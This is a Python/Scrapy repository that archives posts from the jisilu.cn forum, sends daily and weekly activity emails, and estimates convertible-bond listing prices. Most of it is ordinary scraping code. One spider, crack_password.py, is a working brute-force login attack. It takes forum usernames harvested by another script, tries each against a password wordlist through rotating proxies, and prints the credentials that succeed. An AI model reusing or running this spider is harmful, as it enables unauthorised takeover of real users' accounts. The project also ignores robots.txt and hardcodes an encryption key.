├── jsl
    ├── __init__.py
    ├── spiders
    │   ├── __init__.py
    │   ├── aes_encode.py
    │   ├── crack_password.py
    │   ├── relationship.py
    │   ├── questions_loop.py
    │   ├── jisilu_user_content.py
    │   ├── weekly_content.py
    │   ├── allcontent.py
    │   └── questions.py
    ├── items.py
    ├── middlewares.py
    ├── settings.py
    └── pipelines.py
├── daily_trend.bat
├── jsl_daily_content.bat
├── jsl_comphrehensive_content.bat
├── .gitattributes
├── .gitignore
├── single_user.py
├── question.py
├── comprehensive_content.py
├── scrapy.cfg
├── daily_content.py
├── weekly_content.py
├── README.md
├── run.py
├── daily_send.py
├── mongo_syncup.py
├── guess_first_day_price.py
├── collect_username.py
├── trend.py
├── guess_first_day_price_syncup.py
├── crack_jsl.py
└── 数据迁移.ipynb


/jsl/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/daily_trend.bat:
--------------------------------------------------------------------------------
1 | cd C:\Users\Administrator\Documents\code\jsl
2 | python daily_send.py


--------------------------------------------------------------------------------
/jsl_daily_content.bat:
--------------------------------------------------------------------------------
1 | cd C:\Users\Administrator\Documents\code\jsl
2 | python daily_content.py


--------------------------------------------------------------------------------
/jsl_comphrehensive_content.bat:
--------------------------------------------------------------------------------
1 | cd C:\Users\Administrator\Documents\code\jsl
2 | python comprehensive_content.py


--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | *.js linguist-language=python
2 | *.css linguist-language=python
3 | *.ipynb linguist-language=python
4 | *.html linguist-language=python


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | *.pyc
 2 | .idea
 3 | config.py
 4 | *.log
 5 | settings.py
 6 | data.cfg
 7 | config_path/config.json
 8 | config_.py
 9 | creator.txt
10 | userinfo.py
11 | .ipynb_checkpoints/


--------------------------------------------------------------------------------
/single_user.py:
--------------------------------------------------------------------------------
1 | from scrapy import  cmdline
2 | import datetime
3 | # 获取指定日期内的所有帖子
4 | 
5 | # cmd = 'scrapy crawl allcontent'
6 | cmd = 'scrapy crawl single_user'
7 | cmdline.execute(cmd.split())


--------------------------------------------------------------------------------
/jsl/spiders/__init__.py:
--------------------------------------------------------------------------------
1 | # This package will contain the spiders of your Scrapy project
2 | #
3 | # Please refer to the documentation for information on how to create and manage
4 | # your spiders.
5 | 


--------------------------------------------------------------------------------
/question.py:
--------------------------------------------------------------------------------
 1 | # -*-coding=utf-8-*-
 2 | 
 3 | # @Time : 2018/12/27 17:04
 4 | # @File : question.py
 5 | 
 6 | from scrapy import  cmdline
 7 | 
 8 | cmd = 'scrapy crawl questions -s LOG_FILE=log/question.log'
 9 | # cmd = 'scrapy crawl questions'
10 | cmdline.execute(cmd.split())


--------------------------------------------------------------------------------
/comprehensive_content.py:
--------------------------------------------------------------------------------
1 | from scrapy import  cmdline
2 | import datetime
3 | # 获取指定日期内的所有帖子
4 | 
5 | # cmd = 'scrapy crawl allcontent'
6 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=no'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
7 | cmdline.execute(cmd.split())


--------------------------------------------------------------------------------
/scrapy.cfg:
--------------------------------------------------------------------------------
 1 | # Automatically created by: scrapy startproject
 2 | #
 3 | # For more information about the [deploy] section see:
 4 | # https://scrapyd.readthedocs.org/en/latest/deploy.html
 5 | 
 6 | [settings]
 7 | default = jsl.settings
 8 | 
 9 | [deploy]
10 | #url = http://localhost:6800/
11 | project = jsl
12 | 


--------------------------------------------------------------------------------
/daily_content.py:
--------------------------------------------------------------------------------
 1 | # -*-coding=utf-8-*-
 2 | 
 3 | # @Time : 2018/12/27 16:58
 4 | # @File : daily_content.py
 5 | from scrapy import  cmdline
 6 | import datetime
 7 | # 获取指定日期内的所有帖子
 8 | 
 9 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
10 | cmdline.execute(cmd.split())
11 | 


--------------------------------------------------------------------------------
/weekly_content.py:
--------------------------------------------------------------------------------
 1 | # -*-coding=utf-8-*-
 2 | 
 3 | # @Time : 2018/12/27 16:58
 4 | # @File : daily_content.py
 5 | from scrapy import  cmdline
 6 | import datetime
 7 | # 获取指定日期内的所有帖子
 8 | 
 9 | # cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
10 | cmd = 'scrapy crawl week_content'
11 | cmdline.execute(cmd.split())


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # jsl
 2 | 抓取集思录指定的用户的帖子，存档到mongo
 3 | 
 4 | #### 2020-11-27更新 加入登录JS加密与解密
 5 | [http://30daydo.com/article/44109](http://30daydo.com/article/44109)
 6 | 
 7 | <br>
 8 | 使用方法：
 9 | 安装scrapy + pymongo, 安装mongo服务器
10 | 
11 | 安装完成后运行 python run.py
12 | 需要抓取指定的用户名：比如 毛之川
13 | 等待程序返回用户的id，然后把id 复制到spider/jisilu.py 文件中的 self.uid = '8132'， 替换这个值
14 | 修改pipeline.py文件中这一行
15 | self.user = u'毛之川'  # 修改为指定的用户名 如 毛之川 
16 | 
17 | #### 新增爬取全站数据
18 | 
19 | #### guess_first_day_price_syncup.py 估算可转债上市价格
20 | 
21 | ### 关注公众号: 可转债量化分析
22 | ![可转债量化分析](http://xximg.30daydo.com/picgo/kzz.jpg)


--------------------------------------------------------------------------------
/jsl/spiders/aes_encode.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | # @Time : 2020/11/27 22:00
 3 | # @File : aes_encode.py
 4 | # @Author : Rocky C@www.30daydo.com
 5 | 
 6 | import execjs
 7 | import os
 8 | key = '397151C04723421F'
 9 | filename = 'encode_jsl.js'
10 | path = os.path.dirname(os.path.abspath(__file__))
11 | full_path = os.path.join(path,filename)
12 | 
13 | def decoder(text):
14 |     with open(full_path, 'r', encoding='utf8') as f:
15 |         source = f.read()
16 | 
17 |     ctx = execjs.compile(source)
18 |     return ctx.call('jslencode', text, key)
19 | 
20 | 
21 | if __name__ == '__main__':
22 |     print(decoder('123456'))


--------------------------------------------------------------------------------
/run.py:
--------------------------------------------------------------------------------
 1 | # -*-coding=utf-8-*-
 2 | 
 3 | __author__ = 'Rocky'
 4 | '''
 5 | http://30daydo.com
 6 | Email: weigesysu@qq.com
 7 | '''
 8 | from scrapy import  cmdline
 9 | import requests
10 | import re
11 | 
12 | def search_id():
13 |     name = input(u'请输入你需要抓取的用户名: ')
14 |     url = 'https://www.jisilu.cn/people/{}'.format(str(name))
15 |     # url ='https://www.jisilu.cn/people/持有封基'
16 |     r = requests.get(url)
17 |     user_id = re.findall('var PEOPLE_USER_ID = \'(\d+)\';'  , r.text)
18 |     print(user_id[0])
19 | 
20 | def main():
21 |     # search_id()
22 |     # exit()
23 | 
24 |     cmd = 'scrapy crawl allcontent'
25 | 
26 | 
27 | 
28 | if __name__ == '__main__':
29 |     main()


--------------------------------------------------------------------------------
/jsl/items.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | 
 3 | # Define here the models for your scraped items
 4 | #
 5 | # See documentation in:
 6 | # http://doc.scrapy.org/en/latest/topics/items.html
 7 | 
 8 | import scrapy
 9 | 
10 | 
11 | class JslItem(scrapy.Item):
12 |     # define the fields for your item here like:
13 |     # name = scrapy.Field()
14 |     title = scrapy.Field()
15 |     creator = scrapy.Field()
16 |     content = scrapy.Field()
17 |     content_html = scrapy.Field()
18 |     url = scrapy.Field()
19 |     html = scrapy.Field()
20 |     question_id = scrapy.Field()
21 |     createTime = scrapy.Field()
22 |     resp_no = scrapy.Field()
23 |     resp = scrapy.Field()  # list
24 |     crawlTime = scrapy.Field()
25 |     # type_ = scrapy.Field()
26 |     last_resp_date = scrapy.Field()
27 |     only_add = scrapy.Field()
28 | 
29 | class Relationship(scrapy.Item):
30 |     user_id = scrapy.Field()
31 |     flag = scrapy.Field()
32 |     user = scrapy.Field()
33 |     prestige = scrapy.Field()  # 威望
34 |     approve = scrapy.Field()  # 赞同
35 |     follows_count = scrapy.Field()
36 |     fans_count = scrapy.Field()
37 |     follows_list = scrapy.Field()
38 |     fans_list = scrapy.Field()
39 |     crawltime = scrapy.Field()
40 | 
41 | 
42 | 


--------------------------------------------------------------------------------
/daily_send.py:
--------------------------------------------------------------------------------
 1 | # 每天的热帖
 2 | 
 3 | import datetime
 4 | import pymongo
 5 | from settings import send_from_aliyun,DBSelector
 6 | 
 7 | last_time = -10  # 多少周之前
 8 | 
 9 | 
10 | db=DBSelector().mongo()
11 | MAX = 1000
12 | current = datetime.datetime.now()
13 | 
14 | last_day = current + datetime.timedelta(hours=-32) # 脚本设置在早上8点运行
15 | current_str = current.strftime("%Y-%m-%d")
16 | 
17 | 
18 | def main():
19 |     result = db['db_parker']['jsl'].find({},{'html':0}).sort('_id',pymongo.DESCENDING).limit(MAX)
20 |     filter_result = []
21 |     for i in result:
22 |         createTime = i['createTime']
23 |         createTime = datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M')
24 |         if createTime >= last_day :
25 |             title = i['title']
26 |             creator = i['creator']
27 |             resp_count = len(i['resp'])
28 |             url = i['url']
29 |             d = {'title':title,'url':url,'resp_count':resp_count}
30 |             filter_result.append(d)
31 | 
32 |     hot_list = list(sorted(filter_result,key=lambda x:x['resp_count'],reverse=True))[:10]
33 |     title,html = format_mail(hot_list)
34 |     try:
35 |         send_from_aliyun(title,html,types='html')
36 | 
37 |     except Exception as e:
38 |         # logger.error(e)
39 |         print(e)
40 | 
41 | 
42 | def format_mail(hot_list):
43 |     title='{} jsl TOP10'.format(current_str)
44 |     content = ''
45 |     for hl in hot_list:
46 |         content+='<p><a font color="red" href="{}">{}</font> 回复：{}</p><p></p>'.format(hl['url'],hl['title'],hl['resp_count'])
47 | 
48 |     return title,content
49 | 
50 | 
51 | 
52 | if __name__ == '__main__':
53 |     main()


--------------------------------------------------------------------------------
/mongo_syncup.py:
--------------------------------------------------------------------------------
 1 | # 同步两个mongodb的数据
 2 | import pymongo
 3 | from settings import DBSelector
 4 | from loguru import logger
 5 | 
 6 | logger.add('syncup.log')
 7 | db=DBSelector()
 8 | client = db.mongo('qq')
 9 | remote=client['db_parker']['jsl']
10 | local=pymongo.MongoClient()['db_parker']['jsl']
11 | remote_data = remote.find()
12 | 
13 | # 更新本地数据
14 | def update(item,question_id,update=False):
15 |     del item['_id']
16 | 
17 |     if update:
18 |         local.update_one({'question_id':question_id},{'$set':{'resp':item['resp'],'resp_no':item['resp_no']}})
19 |     else:
20 |         local.insert_one(item)
21 |     remote.delete_one({'question_id': question_id})
22 | 
23 | def remove(item):
24 |     remote.delete_one({'_id': item['_id']})
25 | 
26 | 
27 | 
28 | for item in remote_data:
29 |     question_id = item['question_id']
30 |     local_find_doc = local.find_one({'question_id':question_id})
31 |     if local_find_doc:
32 |         resp_no = item['resp_no']
33 | 
34 |         if resp_no<=local_find_doc['resp_no']:
35 |             try:
36 |                 remove(item)
37 |             except Exception as e:
38 |                 logger.error(e)
39 |             else:
40 |                 logger.info(f'删除相同{question_id}')
41 | 
42 |         else:
43 |             try:
44 |                 update(item,question_id,True)
45 |             except Exception as e:
46 |                 logger.error(e)
47 | 
48 |             else:
49 |                 logger.info(f'更新本地{question_id}')
50 |     else:
51 |         try:
52 |             update(item,question_id,False)
53 |         except Exception as e:
54 |             logger.error(e)
55 |         else:
56 |            logger.info(f'删除不存在,备份后的{question_id}')
57 | 


--------------------------------------------------------------------------------
/guess_first_day_price.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | # website: http://30daydo.com
 3 | # @Time : 2019/7/10 22:46
 4 | # @File : guess_first_day_price.py
 5 | 
 6 | # 猜测第一天上市价格
 7 | # 使用twsisted失败
 8 | 
 9 | from twisted.web.client import getPage
10 | from twisted.internet import reactor
11 | from twisted.internet import defer
12 | from scrapy.selector import Selector
13 | import numpy as np
14 | 
15 | result_list = []
16 | 
17 | def get_response_callback(content):
18 |     # print(content)
19 | 
20 |     text = str(content,encoding='utf-8')
21 |     # print(text)
22 |     response = Selector(text=text)
23 |     nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div')
24 |     for node in nodes:
25 |         reply = node.xpath('.//div[@class="markitup-box"]/text()').extract_first()
26 |         if reply:
27 |             reply = reply.strip()
28 |             # print(reply)
29 |             result_list.append(float(reply))
30 | 
31 |     print('done')
32 | 
33 | 
34 | @defer.inlineCallbacks
35 | def task(url):
36 |     d= getPage(url.encode('utf-8'))
37 |     d.addCallback(get_response_callback)
38 |     yield d
39 | 
40 | def get_result():
41 |     # print(result_list)
42 |     # print(result_list)
43 |     result = np.array(result_list)
44 |     print(result.mean())
45 | 
46 | urls='https://www.jisilu.cn/question/id-321075__sort_key-__sort-DESC__uid-__page-{}'
47 | d_list=[]
48 | page = 4
49 | for i in range(1,page+1):
50 |     # print(urls.format(i))
51 |     t = task(urls.format(i))
52 |     # t = task(urls)
53 |     d_list.append(t)
54 | d = defer.DeferredList(d_list)
55 | # d.addBoth(lambda _:reactor.callLater(0,get_result()))
56 | d.addBoth(lambda _:reactor.stop())
57 | reactor.run()
58 | 
59 | 


--------------------------------------------------------------------------------
/collect_username.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | # website: http://30daydo.com
 3 | # @Time : 2020/9/5 14:25
 4 | # @File : collect_username.py
 5 | import pymongo
 6 | import codecs
 7 | from loguru import logger
 8 | from jsl import config
 9 | 
10 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
11 | client = pymongo.MongoClient(connect_uri)
12 | 
13 | doc = client['db_parker'][config.doc_name]
14 | 
15 | def collect_creator():
16 |     creators = doc.find({},{'creator':1})
17 |     user_set = set()
18 |     count = 0
19 |     for create in creators.batch_size(100):
20 |         print(count)
21 |         count+=1
22 |         name = create.get('creator')
23 |         # print(name)
24 |         if name is not None and isinstance(name,str):
25 |             user_set.add(name)
26 |     user_list = list(user_set)
27 |     user_str = '\n'.join(user_list)
28 |     with codecs.open('creator.txt','w',encoding='utf8') as f:
29 |         f.write(user_str)
30 | 
31 | 
32 | def get_user(filename):
33 |     user_list = None
34 |     with codecs.open(filename,'r',encoding='utf8') as f:
35 |         user_list = f.readlines()
36 |         user_list=set(map(lambda x:x.strip(),user_list))
37 |     return user_list
38 | 
39 | def repler():
40 |     resps = doc.find({},{'resp':1,'_id':0})
41 |     user_set = set()
42 |     count = 0
43 |     creartor_set = get_user('creator.txt')
44 | 
45 |     for  resp in resps.batch_size(500):
46 |         resp_list = resp.get('resp')
47 |         if resp_list:
48 |             for resp_ in resp_list:
49 |                 name=list(resp_.keys())[0]
50 |                 if name not in creartor_set and name not in user_set:
51 |                     count += 1
52 |                     print(count)
53 |                     print(name)
54 |                     user_set.add(name)
55 |     user_list = list(user_set)
56 |     user_str = '\n'.join(user_list)
57 |     with codecs.open('reply.txt','w',encoding='utf8') as f:
58 |         f.write(user_str)
59 | 
60 | repler()
61 | logger.info('Done')
62 | 
63 | 
64 | 


--------------------------------------------------------------------------------
/trend.py:
--------------------------------------------------------------------------------
 1 | # -*-coding=utf-8-*-
 2 | 
 3 | # @Time : 2020/1/1 0:08
 4 | # @File : trend.py
 5 | # 统计发帖趋势
 6 | import datetime
 7 | import numpy as np
 8 | import pandas as pd
 9 | from settings import send_from_aliyun, llogger,DBSelector
10 | 
11 | last_time = -10  # 多少周之前
12 | 
13 | logger = llogger('log/trend_.log')
14 | db = DBSelector().mongo()
15 | doc = db['db_parker']['jsl']
16 | total_list = []
17 | date = datetime.datetime.now() + datetime.timedelta(days=-365)  # 一年内的数据
18 | 
19 | 
20 | def main(send_mail=True):
21 |     for item in doc.find({'last_resp_date': {'$gt': date}}, {'html': 0, 'resp': 0, 'content': 0}):
22 |         del item['_id']
23 |         total_list.append(item)
24 | 
25 |     df = pd.DataFrame(total_list)
26 |     df['createTime'] = pd.to_datetime(df['createTime'])
27 |     df = df.set_index('createTime', drop=True)
28 |     new_df = df.resample('W').count()
29 |     show_data = new_df[['creator']].iloc[:last_time:-1]
30 |     # print(show_data)
31 |     # 最大值与
32 |     max_index = new_df['creator'].idxmax().to_pydatetime().strftime('%Y-%m-%d')
33 |     max_v = new_df['creator'].max()
34 |     current = datetime.datetime.now().strftime('%Y-%m-%d')
35 |     title = f'jsl一周发帖数量分析 {current}'
36 |     percentage = np.round(
37 |         (show_data['creator'].values[:-1] - show_data['creator'].values[1:]) / show_data['creator'].values[1:] * 100, 0)
38 |     content = '|  日期  |  贴数  |  环比  |\n'
39 |     # print(percentage)
40 |     percentage = np.append(percentage, np.nan)
41 |     start_index = 0
42 |     for index, item in show_data.iterrows():
43 |         # print(index,item['creator'])
44 |         py_date = index.to_pydatetime().strftime('%Y-%m-%d')
45 |         count = item['creator']
46 |         content += f'| {py_date} | {count} | {percentage[start_index]}% |\n'
47 |         start_index += 1
48 |     content += f'最大值发生在 {max_index}，贴数为 {max_v}\n'
49 |     logger.info(title)
50 |     logger.info(content)
51 |     if send_mail:
52 |         try:
53 |             send_from_aliyun(title, content)
54 |         except Exception as e:
55 |             logger.error(e)
56 | 
57 | 
58 | def process_data():
59 |     '''
60 |     清除一些无用字段的
61 |     :return:
62 |     '''
63 |     # for item in doc.find({'createTime': {"$regex": "^发"}}, {'_id': 1,'createTime':1}):
64 |     for item in doc.find({'crawlTime': None}, {'_id': 1}):
65 |         # print(item)
66 |         doc.delete_one({'_id': item['_id']})
67 |         print(item)
68 | 
69 | if __name__ == '__main__':
70 |     main(send_mail=True)
71 |     # process_data()
72 | 


--------------------------------------------------------------------------------
/jsl/middlewares.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | 
 3 | # Define here the models for your spider middleware
 4 | #
 5 | # See documentation in:
 6 | # http://doc.scrapy.org/en/latest/topics/spider-middleware.html
 7 | import time
 8 | 
 9 | import requests
10 | from scrapy import signals
11 | from jsl.config import proxy_ip
12 | 
13 | class JslSpiderMiddleware(object):
14 |     # Not all methods need to be defined. If a method is not defined,
15 |     # scrapy acts as if the spider middleware does not modify the
16 |     # passed objects.
17 | 
18 |     @classmethod
19 |     def from_crawler(cls, crawler):
20 |         # This method is used by Scrapy to create your spiders.
21 |         s = cls()
22 |         crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
23 |         return s
24 | 
25 |     def process_spider_input(self, response, spider):
26 |         # Called for each response that goes through the spider
27 |         # middleware and into the spider.
28 | 
29 |         # Should return None or raise an exception.
30 |         return None
31 | 
32 |     def process_spider_output(self, response, result, spider):
33 |         # Called with the results returned from the Spider, after
34 |         # it has processed the response.
35 | 
36 |         # Must return an iterable of Request, dict or Item objects.
37 |         for i in result:
38 |             yield i
39 | 
40 |     def process_spider_exception(self, response, exception, spider):
41 |         # Called when a spider or process_spider_input() method
42 |         # (from other spider middleware) raises an exception.
43 | 
44 |         # Should return either None or an iterable of Response, dict
45 |         # or Item objects.
46 |         pass
47 | 
48 |     def process_start_requests(self, start_requests, spider):
49 |         # Called with the start requests of the spider, and works
50 |         # similarly to the process_spider_output() method, except
51 |         # that it doesn’t have a response associated.
52 | 
53 |         # Must return only requests (not items).
54 |         for r in start_requests:
55 |             yield r
56 | 
57 |     def spider_opened(self, spider):
58 |         spider.logger.info('Spider opened: %s' % spider.name)
59 | 
60 | class MyCustomDownloaderMiddleware(object):
61 |     def __init__(self):
62 |         self.proxyurl = 'http://{}:8101/dynamicIp/common/getDynamicIp.do'.format(proxy_ip)
63 | 
64 |     def process_request(self, request, spider):
65 |         proxyServer = self.get_proxy()
66 |         print('使用了代理')
67 |         print(proxyServer)
68 |         request.meta["proxy"] = proxyServer
69 | 
70 |     def get_proxy(self, retry=50):
71 |         for i in range(retry):
72 |             try:
73 |                 r = requests.get(self.proxyurl, timeout=10)
74 |             except Exception as e:
75 |                 print(e)
76 |                 print('Failed to get proxy ip, retry ' + str(i))
77 |                 time.sleep(1)
78 |             else:
79 |                 js = r.json()
80 |                 proxyServer = 'https://{0}:{1}'.format(js.get('ip'), js.get('port'))
81 |                 return proxyServer
82 | 
83 |         return None
84 | 


--------------------------------------------------------------------------------
/jsl/spiders/crack_password.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | # website: http://30daydo.com
 3 | # @Time : 2020/9/5 14:03
 4 | # @File : crack_password.py
 5 | 
 6 | # 登录破解
 7 | import json
 8 | 
 9 | import pymongo
10 | from scrapy import Spider
11 | import codecs
12 | from scrapy import FormRequest, Request
13 | from jsl import config
14 | 
15 | class CrackSpider(Spider):
16 |     name = 'crack'
17 |     custom_settings = {'COOKIES_ENABLED': False,
18 |                        'DOWNLOADER_MIDDLEWARES': {'jsl.middlewares.MyCustomDownloaderMiddleware': 543},
19 |                        'ITEM_PIPELINES': {'jsl.pipelines.JslPipeline': None},
20 |                        'CONCURRENT_REQUESTS':1
21 |                        }
22 | 
23 |     def __init__(self, *args,**kwargs):
24 |         super(CrackSpider, self).__init__(*args,**kwargs)
25 |         self.doc = pymongo.MongoClient(host=config.mongodb_host,port=config.mongodb_port)
26 | 
27 |         filename = 'creator.txt'
28 |         with codecs.open(filename, 'r', encoding='utf8') as f:
29 |             conent = f.readlines()
30 |             self.content = list(map(lambda x: x.strip(), conent))
31 | 
32 |         self.url = 'https://www.jisilu.cn/account/ajax/login_process/'
33 |         self.data = {
34 |             'return_url': 'https://www.jisilu.cn/',
35 |             'user_name': '',
36 |             'password': '',
37 |             'net_auto_login': '1',
38 |             '_post_type': 'ajax',
39 |         }
40 |         self.headers = {
41 |             'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
42 |             'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
43 |             'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
44 |             'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
45 |             'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
46 |             'Referer': 'https://www.jisilu.cn/login/',
47 |             'Accept-Encoding': 'gzip,deflate,br',
48 |             'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
49 |         }
50 |         with open('password.txt', 'r') as f:
51 |             password_list = f.readlines()
52 |             self.password_list = list(map(lambda x: x.strip(), password_list))
53 | 
54 |     def start_requests(self):
55 | 
56 |         yield Request(
57 |             url='https://www.jisilu.cn',
58 |             headers=self.headers,
59 |             callback=self.parse_user,
60 |             cookies=None,
61 |         )
62 | 
63 |     def parse_user(self, response):
64 |         user = self.content.pop()
65 |         while user:
66 |             for password in self.password_list:
67 |                 data = self.data.copy()
68 |                 data['user_name'] = user
69 |                 data['password'] = password
70 |                 yield FormRequest(
71 |                     url=self.url,
72 |                     headers=self.headers,
73 |                     formdata=data,
74 |                     callback=self.parse_data,
75 |                     dont_filter=True,
76 |                     cookies=None,
77 |                     meta={'username':user,'password':password}
78 |                 )
79 | 
80 |     def parse_data(self, response):
81 |         print(response.text)
82 |         js_data = json.loads(response.text)
83 |         errno = js_data.get('errno')
84 |         if errno==0:
85 |             print('*********')
86 |             print('user==>',response.meta['username'])
87 |             print('password==>',response.meta['password'])


--------------------------------------------------------------------------------
/guess_first_day_price_syncup.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | # website: http://30daydo.com
  3 | # @Time : 2019/10/20 19:41
  4 | # @File : guess_first_day_price_syncup.py
  5 | 
  6 | # 同步获取
  7 | import sys
  8 | import time
  9 | from selenium import webdriver
 10 | from scrapy.selector import Selector
 11 | from jsl import config
 12 | import pymongo
 13 | 
 14 | 
 15 | 
 16 | headers = {'User-Agent': 'FireFox Molliza Chrome'}
 17 | path = r'D:\OneDrive\Python\selenium\chromedriver.exe'
 18 | option = webdriver.ChromeOptions()
 19 | option.add_argument(
 20 |     '--user-agent=Mozilla/5.0 (Windows NT 9.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36')
 21 | option.add_argument('--headless')
 22 | driver = webdriver.Chrome(executable_path=path, chrome_options=option)
 23 | driver.implicitly_wait(10)
 24 | 
 25 | 
 26 | def login():
 27 |     url = 'https://www.jisilu.cn/login/'
 28 |     driver.get(url)
 29 |     input_name = driver.find_element_by_xpath('//input[@id="aw-login-user-name"]')
 30 |     input_name.send_keys(config.jsl_user)
 31 |     password = driver.find_element_by_xpath('//input[@id="aw-login-user-password"]')
 32 |     password.send_keys(config.jsl_password)
 33 |     time.sleep(0.5)
 34 |     submit = driver.find_element_by_xpath('//a[@id="login_submit"]')
 35 |     submit.click()
 36 |     time.sleep(5)
 37 | 
 38 | 
 39 | def predict(url,name):
 40 | 
 41 |     driver.get(url)
 42 |     current_page = 1
 43 |     sum = 0
 44 |     price_list = []
 45 |     while 1:
 46 | 
 47 |         try:
 48 | 
 49 |             price = parse(driver.page_source)
 50 |             if price:
 51 |                 price_list.extend(price)
 52 | 
 53 |             next_btn = driver.find_element_by_xpath('//div[@class="pagination pull-right"]//a[contains(text(),">")]')
 54 | 
 55 |         except Exception as e:
 56 |             print(e)
 57 |             break
 58 |         else:
 59 | 
 60 |             current_page += 1
 61 |             next_btn.click()
 62 |     # 改为去掉最大和最小的值
 63 |     max_v=max(price_list)
 64 |     min_v=min(price_list)
 65 |     # print(price_list)
 66 |     price_list.remove(max_v)
 67 |     price_list.remove(min_v)
 68 |     # print(price_list)
 69 |     # price_np = np.array(price_list)
 70 |     for i in price_list:
 71 |         sum+=i
 72 | 
 73 |     avg = round( sum/len(price_list),3)
 74 |     print(f'avg price {avg}')
 75 |     client = pymongo.MongoClient(config.mongodb_host, config.mongodb_port)
 76 |     doc = client['db_stock']['kzz_price_predict']
 77 |     doc.insert_one({'name':name,'predict_price':avg})
 78 |     driver.close()
 79 | 
 80 | 
 81 | def parse(text):
 82 |     response = Selector(text=text)
 83 |     nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')
 84 |     result_list = []
 85 |     for node in nodes:
 86 |         comment = node.xpath(
 87 |             './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
 88 |         if comment:
 89 |             comment = comment.strip()
 90 |             try:
 91 |                 comment = float(comment)
 92 | 
 93 |             except Exception as e:
 94 |                 continue
 95 |             else:
 96 |                 result_list.append(comment)
 97 |         else:
 98 |             continue
 99 |     return result_list
100 | 
101 | 
102 | def main(url,name):
103 |     login()
104 |     predict(url,name)
105 | 
106 | if __name__ == '__main__':
107 |     if len(sys.argv)!=3:
108 |         print('python guess_first_price_syncup url name\n')
109 |     else:
110 |         url=sys.argv[1]
111 |         name =sys.argv[2]
112 |         main(url,name)
113 | 


--------------------------------------------------------------------------------
/jsl/settings.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | # Scrapy settings for jsl project
  4 | #
  5 | # For simplicity, this file contains only settings considered important or
  6 | # commonly used. You can find more settings consulting the documentation:
  7 | #
  8 | #     http://doc.scrapy.org/en/latest/topics/settings.html
  9 | #     http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
 10 | #     http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
 11 | 
 12 | BOT_NAME = 'jsl'
 13 | 
 14 | SPIDER_MODULES = ['jsl.spiders']
 15 | NEWSPIDER_MODULE = 'jsl.spiders'
 16 | 
 17 | 
 18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent
 19 | #USER_AGENT = 'jsl (+http://www.yourdomain.com)'
 20 | 
 21 | # Obey robots.txt rules
 22 | ROBOTSTXT_OBEY = False
 23 | 
 24 | # Configure maximum concurrent requests performed by Scrapy (default: 16)
 25 | 
 26 | #CONCURRENT_REQUESTS = 32
 27 | # LOG_LEVEL='INFO'
 28 | CONCURRENT_REQUESTS = 2
 29 | LOG_LEVEL='INFO'
 30 | DOWNLOAD_DELAY = 1
 31 | # REDIRECT_ENABLED = False
 32 | # Configure a delay for requests for the same website (default: 0)
 33 | # See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
 34 | # See also autothrottle settings and docs
 35 | # DOWNLOAD_DELAY = 1
 36 | # The download delay setting will honor only one of:
 37 | #CONCURRENT_REQUESTS_PER_DOMAIN = 16
 38 | #CONCURRENT_REQUESTS_PER_IP = 16
 39 | 
 40 | # Disable cookies (enabled by default)
 41 | COOKIES_ENABLED = True
 42 | 
 43 | # Disable Telnet Console (enabled by default)
 44 | #TELNETCONSOLE_ENABLED = False
 45 | 
 46 | # Override the default request headers:
 47 | #DEFAULT_REQUEST_HEADERS = {
 48 | #   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
 49 | #   'Accept-Language': 'en',
 50 | #}
 51 | 
 52 | # Enable or disable spider middlewares
 53 | # See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
 54 | #SPIDER_MIDDLEWARES = {
 55 | #    'jsl.middlewares.JslSpiderMiddleware': 543,
 56 | #}
 57 | 
 58 | # Enable or disable downloader middlewares
 59 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
 60 | # DOWNLOADER_MIDDLEWARES = {
 61 | #    'jsl.middlewares.MyCustomDownloaderMiddleware': 543,
 62 | # }
 63 | 
 64 | # Enable or disable extensions
 65 | # See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
 66 | #EXTENSIONS = {
